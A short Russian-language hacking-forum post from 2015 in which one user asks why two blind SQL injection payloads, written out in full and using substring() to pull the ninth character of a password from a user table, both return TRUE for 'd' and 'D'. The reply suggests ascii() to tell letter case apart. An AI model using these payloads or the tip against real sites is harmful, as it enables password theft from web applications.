Показать сообщение отдельно

  #7  
Старый 12.05.2015, 21:53
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:

Почему при ручной эксплуатации blind sql, запросы:
Код:
Code:
or+substring((select+password+from+user+where+id=1+limit+0,1),9,1)=0x64+--+
or+substring((select+password+from+user+where+id=1+limit+0,1),9,1)=0x44+--+
Будут одинаково TRUE? PS 0x64='d' 0x44='D'
Как в таком случае определить в каком регистре буква в пароле?
используйте ascii()
 
Ответить с цитированием